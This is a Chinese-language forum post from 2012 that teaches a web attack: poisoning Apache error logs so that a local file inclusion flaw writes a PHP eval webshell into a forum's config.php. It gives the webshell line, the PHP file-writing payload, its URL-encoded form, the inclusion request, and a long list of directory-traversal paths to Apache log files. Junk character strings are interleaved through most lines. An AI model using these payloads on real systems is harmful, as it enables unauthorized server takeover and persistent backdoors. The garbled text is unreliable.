因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
# q5 ?: k0 i5 C0 W# T& Z9 a/ |1 W
比如还是这句一句话木马
5 ~7 _) B) F8 W, |<?eval($_POST[cmd]);?> # h9 U& o' Y# [& H; p
8 K) n7 K& j5 `9 l1 n
到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, % s& Q0 S! a2 `6 C% b5 r5 e
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
8 Q. N- \* k% a3 d
+ n( Q; w; ^' C3 X ]/ p<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
, ^ i7 E9 K2 k) m: V* Nfclose($fp);?> //在config.php里写入一句木马语句 4 H6 u# U1 H+ I# |8 m }. E
: h1 B) d0 Y$ {9 }0 ~' ]/ O我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。 ( p7 K; I% y: x% ]* v- I
转换为
- {# s$ T. j2 Z& p1 {$ T0 @% T%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
, G* j; h7 K3 J8 e& Gconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp ! u: Y% V" g1 V' L/ Q4 ~
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B + v+ A' d1 P } ]
fclose%28%24fp%29%3B%3F%3E
3 ?8 G+ Z0 `/ }+ }% n我们提交
; H' I4 H+ P( Whttp://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
% L4 g) s0 U9 Y: x%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
, f, s3 B7 w2 u+ A5 c8 i. V%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B - |$ \' ~0 }+ t% Q( N- ^
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
) [5 G% W8 {7 e+ B! q8 c0 ?& m$ h9 B5 J* h& X
这样就错误日志里就记录下了这行写入webshell的代码。
& N9 I1 Z3 W v我们再来包含日志,提交 * y& W T2 C9 c! a+ u2 I
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log * Z: F- O, n( v+ r
& U3 N+ j- U% @# A. J
这样webshell就写入成功了,config.php里就写入一句木马语句 6 d: l7 i4 _* |
OK. 2 s4 U+ r* n& Z9 y
http://www.xxx.com/forum/config.php这个就成了我们的webshell
3 L# m. a8 M! I- [直接用lanker的客户端一连,主机就是你的了。
# Q- Y3 X% ?) E6 r' ?5 _" V% d; |0 E; P# l
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 ; {5 x4 Z$ V0 J( ~$ i. Y
" `6 S2 d! k1 D! {# B$ { q5 X
其他的日志路径,你可以去猜,也可以参照这里。 # l/ Q' ^( R/ m/ Q3 w
../../../../../../../../../../var/log/httpd/access_log
: n0 ]1 v: g! g' |6 w% z2 u../../../../../../../../../../var/log/httpd/error_log
& c! [( X7 P5 a../apache/logs/error.log 1 K$ {5 Q( s8 U$ d# g
../apache/logs/access.log % n. k J, A% _4 P2 f' o7 k
../../apache/logs/error.log 8 H1 K, x, r& V+ w, V
../../apache/logs/access.log ) `7 A' Y0 F9 J
../../../apache/logs/error.log 4 Y/ I h. K8 |2 ~
../../../apache/logs/access.log
+ S9 a( H; A( O7 i; ]* S. d2 U../../../../../../../../../../etc/httpd/logs/acces_log
5 l; C8 W+ S8 i h0 P+ t, G../../../../../../../../../../etc/httpd/logs/acces.log 2 Y L. I: y7 n+ L3 M
../../../../../../../../../../etc/httpd/logs/error_log
2 N' N4 f$ x! m4 G* u6 Q7 f../../../../../../../../../../etc/httpd/logs/error.log " C$ P R* |7 |& }
../../../../../../../../../../var/www/logs/access_log 2 t' R0 `! Y" s$ A. u
../../../../../../../../../../var/www/logs/access.log 2 J; G4 }% y; d1 H
../../../../../../../../../../usr/local/apache/logs/access_log
) c+ ]$ @. w% m! n$ J../../../../../../../../../../usr/local/apache/logs/access.log ; Z9 J/ f0 w% {# h1 Z
../../../../../../../../../../var/log/apache/access_log ) ]9 q2 y4 a- u) w7 j
../../../../../../../../../../var/log/apache/access.log
6 Q1 g, O1 i+ x: ?6 t) ^../../../../../../../../../../var/log/access_log
~7 z( i9 X( u* O% O../../../../../../../../../../var/www/logs/error_log ; E5 x) ?& h# f
../../../../../../../../../../var/www/logs/error.log + u4 Z G% v4 _" s: Z- x- }+ ^
../../../../../../../../../../usr/local/apache/logs/error_log
! h# U, e' w c5 H6 b1 j../../../../../../../../../../usr/local/apache/logs/error.log
1 U! |) |7 n# I7 q0 Z% O- e4 W../../../../../../../../../../var/log/apache/error_log " u: g" \; h( Z* e
../../../../../../../../../../var/log/apache/error.log
2 m- s3 [2 R3 ^5 h../../../../../../../../../../var/log/access_log
) M; q" ?" L. G+ V3 |& b8 u../../../../../../../../../../var/log/error_log
. ], f' S! g( h* V* r7 I/var/log/httpd/access_log ( g7 P" t1 v! ^0 f6 G2 [8 w$ O
/var/log/httpd/error_log
& c1 r; u6 B X8 ^, I2 o../apache/logs/error.log 7 c) i1 M2 ]+ w3 x1 s/ v
../apache/logs/access.log
' l* ?4 ^6 s# B! A4 l2 F../../apache/logs/error.log
" i6 a3 [' P- r0 B, q../../apache/logs/access.log + H g3 b2 B$ ] c! q( l
../../../apache/logs/error.log
3 N" f* ~- h. ]5 b../../../apache/logs/access.log ( T* N h; {$ _) B# p
/etc/httpd/logs/acces_log
. G" k$ o3 R+ }' n- ?9 L# t! |/etc/httpd/logs/acces.log
7 {6 e1 ?2 b- D; K' _/etc/httpd/logs/error_log
, _& h( W$ E2 ]+ E9 f8 u! L/etc/httpd/logs/error.log ' i" p. o% F( J6 D
/var/www/logs/access_log
- Q7 V: m; S: h. E( r: ^0 {3 z+ U5 f/var/www/logs/access.log ' V9 F+ W- k4 y. A* F
/usr/local/apache/logs/access_log 2 {2 R. H7 I8 S5 N. {, {. U+ x
/usr/local/apache/logs/access.log
2 H5 V; B. [8 `/var/log/apache/access_log # L* o4 K2 k0 W- [
/var/log/apache/access.log ! E4 w8 S: \5 C' Q; ?. V
/var/log/access_log
* _, D, ^6 K; i& V1 ^/var/www/logs/error_log * E0 f4 ?( z. V' T- {6 t
/var/www/logs/error.log + P6 s7 x4 m. _
/usr/local/apache/logs/error_log 8 |: |1 l( u+ e! Y3 Q
/usr/local/apache/logs/error.log
( `. m1 j: d8 }! U' \, k/var/log/apache/error_log 7 K( ~) R0 {, S' j" w/ A( v
/var/log/apache/error.log f0 `* ~& |4 Z* A8 d
/var/log/access_log
4 {3 p+ |$ z" a; o# O& X/var/log/error_log |
发表于 2012-9-15 14:27:40
收藏
分享
支持
反对